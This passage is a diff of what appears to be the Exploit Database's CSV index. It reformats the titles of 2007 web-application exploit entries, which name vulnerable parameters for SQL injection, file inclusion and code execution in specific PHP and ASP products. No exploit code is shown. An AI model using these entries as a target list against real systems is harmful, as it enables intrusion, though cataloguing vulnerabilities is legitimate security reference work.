3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection",2007-04-02,ajann,php,webapps,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps,0 -3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0 +3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - 'postid' Blind SQL Injection",2007-04-03,ajann,php,webapps,0 3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Local/Remote File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusions",2007-04-04,kezzap66345,php,webapps,0 -3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 +3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - 'script_path' Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,php,webapps,0 3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 -3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 +3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusions",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL 4.01.02 - 'picture.php' File Disclosure",2007-04-05,Trex,php,webapps,0 -3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - 'downloadpic.php chemin' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 -3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - 'download2.php fn1' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 -3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - (aktualnosci zoom) SQL Injection",2007-04-06,Kacper,php,webapps,0 -3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - (Slownik ssid) SQL Injection",2007-04-06,Kacper,php,webapps,0 -3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - 'smilies.php config' Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 +3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - 'downloadpic.php?chemin' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 +3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - 'download2.php?fn1' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 +3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - aktualnosci zoom SQL Injection",2007-04-06,Kacper,php,webapps,0 +3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - Slownik ssid SQL Injection",2007-04-06,Kacper,php,webapps,0 +3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - 'smilies.php?config' Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion",2007-04-08,bd0rk,php,webapps,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 -3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - 'index.php menu' Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 +3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - 'sn_admin_dir' Local File Inclusion",2007-04-08,BeyazKurt,php,webapps,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - 'warn.php' Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps,0 -3699,platforms/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php include_class' Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 +3699,platforms/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0 3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 -3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 +3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - 'site' Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution",2007-04-11,DarkFig,php,webapps,0 @@ -18297,28 +18298,28 @@ id,file,description,date,author,platform,type,port 3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps,0 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 -3722,platforms/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps,0 -3723,platforms/php/webapps/3723.txt,"Request It 1.0b - 'index.php id' Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 +3722,platforms/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php?cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps,0 +3723,platforms/php/webapps/3723.txt,"Request It 1.0b - 'index.php?id' Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,php,webapps,0 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0 -3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 +3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - 'repertoire_config' Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - 'class.Smarty.php' Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 -3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 -3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - 'who_r.php bj' Remote File Inclusion",2007-04-15,irvian,php,webapps,0 -3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - 'footer.php template' Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 +3739,platforms/php/webapps/3739.php,"Papoo 3.02 - kontakt menuid SQL Injection",2007-04-15,Kacper,php,webapps,0 +3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion",2007-04-15,irvian,php,webapps,0 +3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - 'footer.php?template' Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions",2007-04-15,GoLd_M,php,webapps,0 -3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 +3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - 'arashlib_dir' Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - '/scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0 -3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 +3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - 'GALLERY_BASEDIR' Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - 'index.php ads_file' Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 -3752,platforms/php/webapps/3752.txt,"AjPortal2Php - (PagePrefix) Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0 +3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - 'index.php?ads_file' Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 +3752,platforms/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0 3753,platforms/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - 'CAltInstaller.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3754,platforms/php/webapps/3754.pl,"MiniGal b13 - Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 @@ -18326,103 +18327,103 @@ id,file,description,date,author,platform,type,port 3759,platforms/php/webapps/3759.pl,"Joomla! Component Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3760,platforms/php/webapps/3760.txt,"jGallery 1.3 - 'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 -3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - 'process.php update' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 -3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion",2007-04-18,GoLd_M,php,webapps,0 +3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - 'process.php?update' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 +3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - 'root' Remote File Inclusion",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - 'force_download.php' Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - 'error.asp id' SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusions",2007-04-21,GoLd_M,php,webapps,0 -3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - 'imgsrv.php ac' Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 +3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 3778,platforms/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion",2007-04-23,g00ns,php,webapps,0 3780,platforms/php/webapps/3780.pl,"MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection",2007-04-23,0x86,php,webapps,0 3781,platforms/php/webapps/3781.txt,"Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion",2007-04-23,Omid,php,webapps,0 -3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php asolute' Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 -3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 +3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php?asolute' Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 +3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - 'dir' Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusions",2007-04-24,"ThE TiGeR",php,webapps,0 -3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 +3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - 'dnld' Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion",2007-04-24,DamaR,php,webapps,0 -3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - 'loading.php path_include' Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0 +3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - 'loading.php?path_include' Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0 3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 -3800,platforms/php/webapps/3800.txt,"Ext 1.0 - 'feed-proxy.php feed' Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 -3802,platforms/php/webapps/3802.txt,"PHPBandManager 0.8 - 'index.php pg' Remote File Inclusion",2007-04-26,koray,php,webapps,0 -3803,platforms/php/webapps/3803.txt,"PHPOracleView - 'include_all.inc.php page_dir' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 -3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 - (doc_root) Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 -3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - 'forum.php idsalon' SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 -3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 +3800,platforms/php/webapps/3800.txt,"Ext 1.0 - 'feed-proxy.php?feed' Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 +3802,platforms/php/webapps/3802.txt,"PHPBandManager 0.8 - 'index.php?pg' Remote File Inclusion",2007-04-26,koray,php,webapps,0 +3803,platforms/php/webapps/3803.txt,"PHPOracleView - 'include_all.inc.php?page_dir' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 +3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 - 'doc_root' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 +3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - 'forum.php?idsalon' SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 +3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - 'root' Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 -3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - (SessionUserLang) Shell Injection",2007-04-29,rgod,php,webapps,0 -3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - 'fileview.php album' Local File Inclusion",2007-04-29,DNX,php,webapps,0 -3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - 'index.php show' Remote File Inclusion",2007-04-29,kezzap66345,php,webapps,0 +3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - 'SessionUserLang' Shell Injection",2007-04-29,rgod,php,webapps,0 +3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - 'fileview.php?album' Local File Inclusion",2007-04-29,DNX,php,webapps,0 +3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion",2007-04-29,kezzap66345,php,webapps,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 - 'editusers.php' Remote Change Admin Password",2007-04-30,Dj7xpl,php,webapps,0 -3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 -3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 -3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php form' Local File Inclusion",2007-05-01,ettee,php,webapps,0 -3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 +3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - 'inc_dir' Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - 'wpPATH' Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,php,webapps,0 +3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - 'wppath' Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusions",2007-05-03,GoLd_M,php,webapps,0 -3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - 'header.php ote_home' Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 +3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - 'header.php?ote_home' Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - 'censura.php vendorid' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php locale' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 -3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - 'ajax_listado.php urlModulo' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 -3848,platforms/php/webapps/3848.txt,"workbench 0.11 - 'header.php path' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - 'censura.php?vendorid' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - 'ajax_listado.php?urlModulo' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3848,platforms/php/webapps/3848.txt,"workbench 0.11 - 'header.php?path' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps,0 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 -3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - 'right_file' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 3857,platforms/php/webapps/3857.txt,"vm Watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,php,webapps,0 -3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - 'cms2.php s_dir' Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 +3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3861,platforms/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - 'mfa_theme.php' Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - SQL Injection",2007-05-06,"Mehmet Ince",php,webapps,0 -3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 -3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - (friendly_path) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 -3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 -3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - 'acgv.php rubrik' Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 -3868,platforms/php/webapps/3868.txt,"DynamicPAD 1.02.18 - (HomeDir) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 -3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 -3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php views_path' Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 -3874,platforms/php/webapps/3874.txt,"CGX 20050314 - (pathCGX) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 -3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - (path_local) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 +3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php?sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 +3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - 'friendly_path' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 +3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - 'RESPATH' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 +3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - 'acgv.php?rubrik' Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 +3868,platforms/php/webapps/3868.txt,"DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 +3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 +3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php?views_path' Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 +3874,platforms/php/webapps/3874.txt,"CGX 20050314 - 'pathCGX' Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 +3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - 'path_local' Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 